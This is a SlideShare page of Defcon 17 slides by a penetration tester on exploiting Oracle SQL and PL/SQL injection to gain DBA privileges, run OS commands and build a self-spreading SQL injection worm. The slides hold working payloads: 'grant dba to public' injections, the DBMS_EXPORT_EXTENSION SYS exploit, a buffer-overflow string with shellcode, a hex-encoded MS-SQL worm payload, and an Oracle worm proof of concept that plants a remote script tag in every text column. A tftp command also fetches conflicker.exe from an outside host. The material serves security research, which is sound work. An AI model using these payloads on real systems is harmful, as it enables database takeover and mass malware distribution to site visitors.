SlideShare une entreprise Scribd logo

Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm

G
guest785f78

These are the slides from the defcon talk title 'The making of 2nd sql injection worm'. Refer to the video presentations uploaded on www.notsosecure.com.

TechnologieBusiness
1  sur  19
Télécharger pour lire hors ligne
The Making Of Second SQL Injection Worm (Oracle Edition) Sumit Siddharth SID@notsosecure.com www.notsosecure.com Defcon 17 Las Vegas –2009
About Me: Senior IT Security Consultant More than 4 years of Penetration Testing Not an Oracle Geek :( My Blog: www.notsosecure.com 10 slides + 2 Demos= 20 Mins !! Defcon 17, Las Vegas, July 2009 2
Agenda How to exploit SQL Injections in web applications with oracle back-end to achieve the following: Escalate privileges from the session user to that of SYS (Similar to openrowset hacks in MS SQL) Execute OS Commands and achieve file system read/write access (Like xp_cmdshell in MS SQL) Can worms target Oracle web apps? (Just as they did against MS SQL) Defcon 17, Las Vegas, July 2009 3
Oracle: How Things Work By default Oracle comes with a lot of stored procedures and functions. Mostly these functions and stored procedures run with definer privileges (default). In order to make the function execute with the privileges of the user executing it, the function must have 'authid current_user' keyword. If you find a SQL (PL/SQL) injection in a function owned by SYS and with 'authid definer', you can run SQL (PL/SQL) as SYS. Defcon 17, Las Vegas, July 2009 4
SQL Injection in Oracle: • PL/SQL Injection • SQL Injection • Injection in • Injection in Single SQL Anonymous Statement PL/SQL block • Restrictions • No ';' allowed • No Restriction • Need more vulnerabilities • Execute DDL, DML • Difficult • Easy Defcon 17, Las Vegas, July 2009 5
PL/SQL Injection  Injection in Anonymous PL/SQL block create or replace procedure orasso.test (q IN varchar2) AS BEGIN execute immediate ('begin '||q||'; end;'); END; * Attack has no limitation * Can Execute DML and DDL statements * Easy to exploit * Can Execute Multiple statements: * q=>null;execute immediate 'grant dba to public';end'-- Defcon 17, Las Vegas, July 2009 6
PL/SQL Injection from Web Apps  Vulnerable Oracle Application server allows PL/SQL injection  Bypass the PL/SQL exclusion list:  http://host:7777/pls/orasso/orasso.home?);execute+immediate+:1; --={PL/SQL}  Execute PL/SQL with permissions of user described in 'DAD' (orasso_public)  Exploit vulnerable procedures and become DBA  Don't rely on 'create function' privileges  LT.COMPRESSWORKSPACETREE (CPU Oct 2008; milw0rm:7677)  LT.FINDRICSET (CPU October 2007; milw0rm:4572)  .....100 more of these.....  Execute OS code (I Prefer Java) Defcon 17, Las Vegas, July 2009 7
Hacking OAS with OAP_Hacker.pl  OAP_hacker.pl  Supports O.A.S <=10.1.2.2 Relies on PL/SQL injection vulnerability Exploits vulnerable packages and grants DBA to 'public'  Generally orasso_public do not have create function privilege  Exploit based on Cursor Injection; Don't need create function OS code execution based on Java Demo Defcon 17, Las Vegas, July 2009 8
PL/SQL Injection  Custom written Packages deployed on OAS may have PL/SQL Injection  Example: create or replace procedure orasso.test(q IN varchar2) AS BEGIN .... execute immediate ('begin '||q||'; end;'); ..... end;  http://host/pls/orasso/orasso.test?q=orasso.home  http://host/pls/orasso/orasso.test?q=execute Immediate 'grant dba to public' Defcon 17, Las Vegas, July 2009 9
SQL Injection In Web Apps. Injection in Single SQL statement: e.g. “Select a from b where c=”.'$input' Oracle does not support nested query in SQL To execute multiple query we need to find a PL/SQL Injection. How can we inject PL/SQL when the web application's SQL Injection allows only SQL? If there is a PL/SQL injection vulnerability in a function, then we can use web's SQL Injection to call this function, thereby executing PL/SQL via SQL Injection. Defcon 17, Las Vegas, July 2009 10
SQL Injection and Vulnerable Functions We can call functions in SQL but not procedures Exploit Functions vulnerable to Buffer overflow and other issues MDSYS.MD2.SDO_CODE_SIZE('AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD DDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGG GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHH HHHHHHHHHHH'||CHR(131)||CHR(195)||CHR(9)||CHR(255)||CHR (227)||CHR(251)||CHR(90)|| CHR(19)||CHR(124)||CHR(54)||CHR(141)||CHR(67)||CHR(19)||CHR(80)||chr(184)||chr(191)|| chr(142)||chr(01)||chr(120)||chr(255)||chr(208)||chr(184)||chr(147)||chr(131)||chr(00)||chr(120)|| chr(255)||chr(208)||'dir >c:dir.txt')-- Exploit Functions vulnerable to PL/SQL Injection ➔If Authid=definer; execute PL/SQL with definer privileges ➔If Authid=current_user; execute PL/SQL; exploit vulnerable packages ➔Privilege escalation; become DBA ➔Execute OS Code Defcon 17, Las Vegas, July 2009 11
Introducing Dbms_Export_Extension Its an Oracle package which has had a number of functions and procedures vulnerable to PL/SQL injections, allowing privilege escalation. GET_DOMAIN_INDEX_TABLES(); function vulnerable to PL/SQL Injection; owned by sys; runs as sys We can inject PL/SQL within this function and the PL/SQL will get executed as SYS. The Function can be called from SQL queries such as SELECT, INSERT, UPDATE etc. Defcon 17, Las Vegas, July 2009 12
PL/SQL Injection in dbms_export_extension FUNCTION GET_DOMAIN_INDEX_TABLES ( INDEX_NAME IN VARCHAR2, INDEX_SCHEMA IN VARCHAR2, TYPE_NAME IN VARCHAR2, TYPE_SCHEMA IN VARCHAR2, READ_ONLY IN PLS_INTEGER, VERSION IN VARCHAR2, GET_TABLES IN PLS_INTEGER) RETURN VARCHAR2 IS BEGIN [...] STMTSTRING := 'BEGIN ' || '"' || TYPE_SCHEMA || '"."' || TYPE_NAME || '".ODCIIndexUtilCleanup(:p1); ' || 'END;'; DBMS_SQL.PARSE(CRS, STMTSTRING, DBMS_SYS_SQL.V7); DBMS_SQL.BIND_VARIABLE(CRS,':p1',GETTABLENAMES_CONTEXT); [...] END GET_DOMAIN_INDEX_TABLES; Defcon 17, Las Vegas, July 2009 13
Example select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_ INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PU T(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' grant dba to public'''';END;'';END;-- ','SYS',0,'1',0) from dual Fixed in CPU April 2006. Vulnerable versions: Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2, XE Defcon 17, Las Vegas, July 2009 14
Bsqlbf v2.3 Uses this Oracle exploit to achieve the following: Privilege escalation (Type 3) OS code execution (Type 4)  with Java (default; stype 0)  with plsql_native_make_utility (Oracle 9; stype 1)  with dbms_scheduler (oracle 10; stype 2) File system read/write access (Type 5;Java only) Demo available at www.notsosecure.com Defcon 17, Las Vegas, July 2009 15
SQL Injection w0rms  MS-SQL:  s=290';DECLARE%20@S %20NVARCHAR(4000);=CAST(0x6400650063006C00610072006500200040006D0020007600610072006300680061007200280038003000300030002900 3B00730065007400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D002B0027007500700064006100740065 005B0027002B0061002E006E0061006D0065002B0027005D007300650074005B0027002B0062002E006E0061006D0065002B0027005D003D0072007400 720069006D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0062002E006E0061006D0065002B002700290 029002B00270027003C0073006300720069007000740020007300720063003D00220068007400740070003A002F002F0079006C00310038002E006E0065 0074002F0030002E006A00730022003E003C002F007300630072006900700074003E00270027003B0027002000660072006F006D002000640062006F002 E007300790073006F0062006A006500630074007300200061002C00640062006F002E0073007900730063006F006C0075006D006E007300200062002C00 640062006F002E007300790073007400790070006500730020006300200077006800650072006500200061002E00690064003D0062002E0069006400200 061006E006400200061002E00780074007900700065003D0027005500270061006E006400200062002E00780074007900700065003D0063002E00780074 00790070006500200061006E006400200063002E006E0061006D0065003D002700760061007200630068006100720027003B00730065007400200040006 D003D005200450056004500520053004500280040006D0029003B00730065007400200040006D003D0073007500620073007400720069006E006700280 040006D002C0050004100540049004E004400450058002800270025003B00250027002C0040006D0029002C00380030003000300029003B00730065007 400200040006D003D005200450056004500520053004500280040006D0029003B006500780065006300280040006D0029003B00%20AS %20NVARCHAR(4000));EXEC(@S);--  Oracle:  http://127.0.0.1:81/ora4.php?name=1 and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin execute immediate '''''''' alter session set current_schema=SCOTT ''''''''; execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)||chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)|| chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME = C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr(82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE rec.foo;end loop;execute immediate ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)-- Defcon 17, Las Vegas, July 2009 16
What 'could' the worm do  Update certain database tables The website not starts to distribute malware Pwn legitimate users of the site with browser exploits  There are enough 'ie' 0 days out there.  OS code execution allows distribution of other worms such as Conflicker! select LinxRunCmd('tftp -i x.x.x.x GET conflicker.exe') from dual  Exploit other Oracle components on internal network Oracle Secure back-up; Remote Command Injection (CPU 2009) SQL Injection in Oracle Enterprise Manager (CPU 2009) TNS Listener exploits (milw0rm: 8507) ....100 other things to do.... Defcon 17, Las Vegas, July 2009 17
Demos Demo 1: Hacking OAS with OAS_hacker.pl Demo 2: Privilege escalation; Extracting data with SYS privileges (visit www.notsosecure.com) Demo 3: O.S code execution; With Java (@ notsosecure) Demo 4: P.O.C for a potential Oracle SQL Injection worm Defcon 17, Las Vegas, July 2009 18
Thank You References: http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_kupw$worker2.html  http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_lt_findricset.html  http://www.breach.com/resources/breach-security-labs/alerts/breach-security-labs-releases-alert-on-oracle-application-ser  http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html  http://sec.hebei.com.cn/bbs_topic.do?forumID=18&postID=4275&replyID=0&skin=1&saveSkin=true&pages=0&replyNum  http://milw0rm.com/exploits/3269  http://www.securityfocus.com/bid/17699  http://www.orafaq.com/wiki/PL/SQL_FAQ#What_is_the_difference_between_SQL_and_PL.2FSQL.3F  http://www.red-database-security.com/wp/confidence2009.pdf  http://alloracletech.blogspot.com/2008/07/authid-definer-vs-authid-currentuser.html  http://www.owasp.org/index.php/Testing_for_Oracle  http://www.red-database-security.com/wp/google_oracle_hacking_us.pdf  http://lab.mediaservice.net/notes_more.php?id=Oracle_Portal_for_Friends  http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_kupw$worker2.html  http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-fayo.pdf   And Lots more; can't fit in the space here.... Defcon 17, Las Vegas, July 2009 19

Recommandé

PL/SQL User-Defined Functions in the Read World
PL/SQL User-Defined Functions in the Read WorldPL/SQL User-Defined Functions in the Read World
PL/SQL User-Defined Functions in the Read WorldMichael Rosenblum
 
Hidden Gems of Performance Tuning: Hierarchical Profiler and DML Trigger Opti...
Hidden Gems of Performance Tuning: Hierarchical Profiler and DML Trigger Opti...Hidden Gems of Performance Tuning: Hierarchical Profiler and DML Trigger Opti...
Hidden Gems of Performance Tuning: Hierarchical Profiler and DML Trigger Opti...Michael Rosenblum
 
Flexviews materialized views for my sql
Flexviews materialized views for my sqlFlexviews materialized views for my sql
Flexviews materialized views for my sqlJustin Swanhart
 
A New View of Database Views
A New View of Database ViewsA New View of Database Views
A New View of Database ViewsMichael Rosenblum
 
Data Tracking: On the Hunt for Information about Your Database
Data Tracking: On the Hunt for Information about Your DatabaseData Tracking: On the Hunt for Information about Your Database
Data Tracking: On the Hunt for Information about Your DatabaseMichael Rosenblum
 
Firebird
FirebirdFirebird
FirebirdChinsan Huang
 
Noinject
NoinjectNoinject
NoinjectJustin Swanhart
 
Why is the application running so slowly?
Why is the application running so slowly?Why is the application running so slowly?
Why is the application running so slowly?Michael Rosenblum
 

Recommandé

PL/SQL User-Defined Functions in the Read World
PL/SQL User-Defined Functions in the Read WorldPL/SQL User-Defined Functions in the Read World
PL/SQL User-Defined Functions in the Read WorldMichael Rosenblum
 
Hidden Gems of Performance Tuning: Hierarchical Profiler and DML Trigger Opti...
Hidden Gems of Performance Tuning: Hierarchical Profiler and DML Trigger Opti...Hidden Gems of Performance Tuning: Hierarchical Profiler and DML Trigger Opti...
Hidden Gems of Performance Tuning: Hierarchical Profiler and DML Trigger Opti...Michael Rosenblum
 
Flexviews materialized views for my sql
Flexviews materialized views for my sqlFlexviews materialized views for my sql
Flexviews materialized views for my sqlJustin Swanhart
 
A New View of Database Views
A New View of Database ViewsA New View of Database Views
A New View of Database ViewsMichael Rosenblum
 
Data Tracking: On the Hunt for Information about Your Database
Data Tracking: On the Hunt for Information about Your DatabaseData Tracking: On the Hunt for Information about Your Database
Data Tracking: On the Hunt for Information about Your DatabaseMichael Rosenblum
 
Firebird
FirebirdFirebird
FirebirdChinsan Huang
 
Noinject
NoinjectNoinject
NoinjectJustin Swanhart
 
Why is the application running so slowly?
Why is the application running so slowly?Why is the application running so slowly?
Why is the application running so slowly?Michael Rosenblum
 
How to export import a mysql database via ssh in aws lightsail wordpress rizw...
How to export import a mysql database via ssh in aws lightsail wordpress rizw...How to export import a mysql database via ssh in aws lightsail wordpress rizw...
How to export import a mysql database via ssh in aws lightsail wordpress rizw...AlexRobert25
 
IEEE Day 2013 Oracle Database 12c: new features for developers
IEEE Day 2013 Oracle Database 12c: new features for developersIEEE Day 2013 Oracle Database 12c: new features for developers
IEEE Day 2013 Oracle Database 12c: new features for developersRamin Orujov
 
Managing Unstructured Data: Lobs in the World of JSON
Managing Unstructured Data: Lobs in the World of JSONManaging Unstructured Data: Lobs in the World of JSON
Managing Unstructured Data: Lobs in the World of JSONMichael Rosenblum
 
GDG DevFest 2015 - Reactive approach for slowpokes
GDG DevFest 2015 - Reactive approach for slowpokesGDG DevFest 2015 - Reactive approach for slowpokes
GDG DevFest 2015 - Reactive approach for slowpokesSergey Tarasevich
 
Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기JeongHun Byeon
 
Bypass dbms assert
Bypass dbms assertBypass dbms assert
Bypass dbms assertfangjiafu
 
Everything as a code
Everything as a codeEverything as a code
Everything as a codeAleksandr Tarasov
 
Oracle Cloud As Services
Oracle Cloud As ServicesOracle Cloud As Services
Oracle Cloud As ServicesÖzgür Umut Vurgun
 
監査ログをもっと身近に!〜統合監査のすすめ〜
監査ログをもっと身近に!〜統合監査のすすめ〜監査ログをもっと身近に!〜統合監査のすすめ〜
監査ログをもっと身近に!〜統合監査のすすめ〜Michitoshi Yoshida
 
ES6, 잘 쓰고 계시죠?
ES6, 잘 쓰고 계시죠?ES6, 잘 쓰고 계시죠?
ES6, 잘 쓰고 계시죠?장현 한
 
Docker In Bank Unrated
Docker In Bank UnratedDocker In Bank Unrated
Docker In Bank UnratedAleksandr Tarasov
 
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOps
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOpsPVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOps
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOpsAndrey Karpov
 
Jdk 7 4-forkjoin
Jdk 7 4-forkjoinJdk 7 4-forkjoin
Jdk 7 4-forkjoinknight1128
 
Jdk(java) 7 - 6 기타기능
Jdk(java) 7 - 6 기타기능Jdk(java) 7 - 6 기타기능
Jdk(java) 7 - 6 기타기능knight1128
 
Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)philipdurbin
 
Angular 1 + es6
Angular 1 + es6Angular 1 + es6
Angular 1 + es6장현 한
 
Unit testing
Unit testingUnit testing
Unit testingdavidahaskins
 
Spring & Hibernate
Spring & HibernateSpring & Hibernate
Spring & HibernateJiayun Zhou
 
ORM Injection
ORM InjectionORM Injection
ORM InjectionSimone Onofri
 
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksRuss McRee
 
Defcon 18 "Hacking Electronic Door Access Controllers"
Defcon 18 "Hacking Electronic Door Access Controllers" Defcon 18 "Hacking Electronic Door Access Controllers"
Defcon 18 "Hacking Electronic Door Access Controllers" shawn_merdinger
 

Contenu connexe

Tendances

How to export import a mysql database via ssh in aws lightsail wordpress rizw...
How to export import a mysql database via ssh in aws lightsail wordpress rizw...How to export import a mysql database via ssh in aws lightsail wordpress rizw...
How to export import a mysql database via ssh in aws lightsail wordpress rizw...AlexRobert25
 
IEEE Day 2013 Oracle Database 12c: new features for developers
IEEE Day 2013 Oracle Database 12c: new features for developersIEEE Day 2013 Oracle Database 12c: new features for developers
IEEE Day 2013 Oracle Database 12c: new features for developersRamin Orujov
 
Managing Unstructured Data: Lobs in the World of JSON
Managing Unstructured Data: Lobs in the World of JSONManaging Unstructured Data: Lobs in the World of JSON
Managing Unstructured Data: Lobs in the World of JSONMichael Rosenblum
 
GDG DevFest 2015 - Reactive approach for slowpokes
GDG DevFest 2015 - Reactive approach for slowpokesGDG DevFest 2015 - Reactive approach for slowpokes
GDG DevFest 2015 - Reactive approach for slowpokesSergey Tarasevich
 
Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기JeongHun Byeon
 
Bypass dbms assert
Bypass dbms assertBypass dbms assert
Bypass dbms assertfangjiafu
 
監査ログをもっと身近に!〜統合監査のすすめ〜
監査ログをもっと身近に!〜統合監査のすすめ〜監査ログをもっと身近に!〜統合監査のすすめ〜
監査ログをもっと身近に!〜統合監査のすすめ〜Michitoshi Yoshida
 
ES6, 잘 쓰고 계시죠?
ES6, 잘 쓰고 계시죠?ES6, 잘 쓰고 계시죠?
ES6, 잘 쓰고 계시죠?장현 한
 
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOps
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOpsPVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOps
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOpsAndrey Karpov
 
Jdk 7 4-forkjoin
Jdk 7 4-forkjoinJdk 7 4-forkjoin
Jdk 7 4-forkjoinknight1128
 
Jdk(java) 7 - 6 기타기능
Jdk(java) 7 - 6 기타기능Jdk(java) 7 - 6 기타기능
Jdk(java) 7 - 6 기타기능knight1128
 
Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)philipdurbin
 
Angular 1 + es6
Angular 1 + es6Angular 1 + es6
Angular 1 + es6장현 한
 
Spring & Hibernate
Spring & HibernateSpring & Hibernate
Spring & HibernateJiayun Zhou
 
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...탑크리에듀(구로디지털단지역3번출구 2분거리)
 

Tendances (20)

How to export import a mysql database via ssh in aws lightsail wordpress rizw...
How to export import a mysql database via ssh in aws lightsail wordpress rizw...How to export import a mysql database via ssh in aws lightsail wordpress rizw...
How to export import a mysql database via ssh in aws lightsail wordpress rizw...
 
IEEE Day 2013 Oracle Database 12c: new features for developers
IEEE Day 2013 Oracle Database 12c: new features for developersIEEE Day 2013 Oracle Database 12c: new features for developers
IEEE Day 2013 Oracle Database 12c: new features for developers
 
Managing Unstructured Data: Lobs in the World of JSON
Managing Unstructured Data: Lobs in the World of JSONManaging Unstructured Data: Lobs in the World of JSON
Managing Unstructured Data: Lobs in the World of JSON
 
GDG DevFest 2015 - Reactive approach for slowpokes
GDG DevFest 2015 - Reactive approach for slowpokesGDG DevFest 2015 - Reactive approach for slowpokes
GDG DevFest 2015 - Reactive approach for slowpokes
 
Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기
 
Bypass dbms assert
Bypass dbms assertBypass dbms assert
Bypass dbms assert
 
Everything as a code
Everything as a codeEverything as a code
Everything as a code
 
Oracle Cloud As Services
Oracle Cloud As ServicesOracle Cloud As Services
Oracle Cloud As Services
 
監査ログをもっと身近に!〜統合監査のすすめ〜
監査ログをもっと身近に!〜統合監査のすすめ〜監査ログをもっと身近に!〜統合監査のすすめ〜
監査ログをもっと身近に!〜統合監査のすすめ〜
 
ES6, 잘 쓰고 계시죠?
ES6, 잘 쓰고 계시죠?ES6, 잘 쓰고 계시죠?
ES6, 잘 쓰고 계시죠?
 
Docker In Bank Unrated
Docker In Bank UnratedDocker In Bank Unrated
Docker In Bank Unrated
 
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOps
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOpsPVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOps
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOps
 
Jdk 7 4-forkjoin
Jdk 7 4-forkjoinJdk 7 4-forkjoin
Jdk 7 4-forkjoin
 
Jdk(java) 7 - 6 기타기능
Jdk(java) 7 - 6 기타기능Jdk(java) 7 - 6 기타기능
Jdk(java) 7 - 6 기타기능
 
Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)
 
Angular 1 + es6
Angular 1 + es6Angular 1 + es6
Angular 1 + es6
 
Unit testing
Unit testingUnit testing
Unit testing
 
Spring & Hibernate
Spring & HibernateSpring & Hibernate
Spring & Hibernate
 
ORM Injection
ORM InjectionORM Injection
ORM Injection
 
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
 

En vedette

DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksRuss McRee
 
Defcon 18 "Hacking Electronic Door Access Controllers"
Defcon 18 "Hacking Electronic Door Access Controllers" Defcon 18 "Hacking Electronic Door Access Controllers"
Defcon 18 "Hacking Electronic Door Access Controllers" shawn_merdinger
 
DefCon 2012 - Near-Field Communication / RFID Hacking - Lee
DefCon 2012 - Near-Field Communication / RFID Hacking - LeeDefCon 2012 - Near-Field Communication / RFID Hacking - Lee
DefCon 2012 - Near-Field Communication / RFID Hacking - LeeMichael Smith
 
Black hat and defcon 2014
Black hat and defcon 2014Black hat and defcon 2014
Black hat and defcon 2014Peter Swedin
 
Cyber Grand Challenge及DEFCON 24 CTF决赛介绍
Cyber Grand Challenge及DEFCON 24 CTF决赛介绍Cyber Grand Challenge及DEFCON 24 CTF决赛介绍
Cyber Grand Challenge及DEFCON 24 CTF决赛介绍Ray Song
 
Art of Trolling Defcon 19
Art of Trolling Defcon 19Art of Trolling Defcon 19
Art of Trolling Defcon 19openfly
 
Building a website, McGill Course
Building a website, McGill CourseBuilding a website, McGill Course
Building a website, McGill CoursePinny Gniwisch
 
8 sql injection
8 sql injection8 sql injection
8 sql injectiondrewz lin
 
Give Me Three Things: Anti-Virus Bypass Made Easy
Give Me Three Things: Anti-Virus Bypass Made EasyGive Me Three Things: Anti-Virus Bypass Made Easy
Give Me Three Things: Anti-Virus Bypass Made EasySecurity Weekly
 
Defcon 17 Tactical Fingerprinting using Foca
Defcon 17 Tactical Fingerprinting using FocaDefcon 17 Tactical Fingerprinting using Foca
Defcon 17 Tactical Fingerprinting using FocaChema Alonso
 
New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20Nick Galbreath
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
26066395 k-r-i-m-i-n-a-l-i-s-t-i-k-aa
26066395 k-r-i-m-i-n-a-l-i-s-t-i-k-aa26066395 k-r-i-m-i-n-a-l-i-s-t-i-k-aa
26066395 k-r-i-m-i-n-a-l-i-s-t-i-k-aazogaj
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23DefconRussia
 
Hacking Windows 95 #33c3
Hacking Windows 95 #33c3Hacking Windows 95 #33c3
Hacking Windows 95 #33c3Zoltan Balazs
 
Kontrollimi Teknik I Automjeteve Te Lehta
Kontrollimi Teknik I Automjeteve Te LehtaKontrollimi Teknik I Automjeteve Te Lehta
Kontrollimi Teknik I Automjeteve Te LehtaBesart Vllasa
 
DEFCON17 - Your Mind: Legal Status, Rights and Securing Yourself
DEFCON17 - Your Mind: Legal Status, Rights and Securing YourselfDEFCON17 - Your Mind: Legal Status, Rights and Securing Yourself
DEFCON17 - Your Mind: Legal Status, Rights and Securing YourselfJames Arlen
 
PUNIM SEMINARIK "SHKENCA"
PUNIM SEMINARIK "SHKENCA"PUNIM SEMINARIK "SHKENCA"
PUNIM SEMINARIK "SHKENCA"fisnik baliu
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 

En vedette (20)

DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
 
Defcon 18 "Hacking Electronic Door Access Controllers"
Defcon 18 "Hacking Electronic Door Access Controllers" Defcon 18 "Hacking Electronic Door Access Controllers"
Defcon 18 "Hacking Electronic Door Access Controllers"
 
DefCon 2012 - Near-Field Communication / RFID Hacking - Lee
DefCon 2012 - Near-Field Communication / RFID Hacking - LeeDefCon 2012 - Near-Field Communication / RFID Hacking - Lee
DefCon 2012 - Near-Field Communication / RFID Hacking - Lee
 
Black hat and defcon 2014
Black hat and defcon 2014Black hat and defcon 2014
Black hat and defcon 2014
 
Cyber Grand Challenge及DEFCON 24 CTF决赛介绍
Cyber Grand Challenge及DEFCON 24 CTF决赛介绍Cyber Grand Challenge及DEFCON 24 CTF决赛介绍
Cyber Grand Challenge及DEFCON 24 CTF决赛介绍
 
Art of Trolling Defcon 19
Art of Trolling Defcon 19Art of Trolling Defcon 19
Art of Trolling Defcon 19
 
Building a website, McGill Course
Building a website, McGill CourseBuilding a website, McGill Course
Building a website, McGill Course
 
8 sql injection
8 sql injection8 sql injection
8 sql injection
 
Give Me Three Things: Anti-Virus Bypass Made Easy
Give Me Three Things: Anti-Virus Bypass Made EasyGive Me Three Things: Anti-Virus Bypass Made Easy
